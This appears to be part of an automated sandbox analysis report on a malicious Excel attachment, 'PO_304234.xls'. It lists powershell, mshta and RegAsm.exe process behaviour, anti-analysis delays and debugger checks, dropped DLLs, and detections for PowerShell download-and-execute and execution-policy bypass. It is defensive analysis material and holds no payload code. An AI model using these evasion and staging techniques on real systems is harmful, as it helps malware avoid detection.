                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: PO_304234.xlsStream path 'Workbook' entropy: 7.99935565491 (max. 8.0)
                  Source: A7130000.0.drStream path 'Workbook' entropy: 7.99933786036 (max. 8.0)

                  Malware Analysis System Evasion

                  barindex
                  Delayed program exit found
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040F7E2 Sleep,ExitProcess,28_2_0040F7E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,28_2_0041A7D9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6728Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3219Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 655Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 770Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1693Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2952Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2505Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7482Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1348
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1348
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 474
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1876
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 919
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3489
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 7.2 %
                  Source: C:\Windows\System32\mshta.exe TID: 3796Thread sleep time: -360000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3956Thread sleep count: 6728 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3956Thread sleep count: 3219 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4000Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2864Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2520Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2900Thread sleep count: 1693 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2900Thread sleep count: 2952 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1032Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2040Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2040Thread sleep time: -3600000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2040Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2584Thread sleep count: 2505 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2584Thread sleep time: -7515000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2732Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2584Thread sleep count: 7482 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2584Thread sleep time: -22446000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\mshta.exe TID: 1484Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3332Thread sleep count: 1348 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3332Thread sleep count: 1348 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3644Thread sleep time: -180000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3600Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4020Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3708Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 800Thread sleep count: 919 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 800Thread sleep count: 3489 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4076Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep time: -1200000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4084Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,28_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,28_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,28_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00407877 FindFirstFileW,FindNextFileW,28_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0044E8F9 FindFirstFileExA,28_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,28_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,28_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,28_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,28_2_00407CD2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,28_2_0041CBE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00443355 mov eax, dword ptr fs:[00000030h]28_2_00443355
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004120B2 GetProcessHeap,HeapFree,28_2_004120B2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00434BD8 SetUnhandledExceptionFilter,28_2_00434BD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_0043503C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0043BB71

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3180, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3788, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR
                  Bypasses PowerShell execution policy
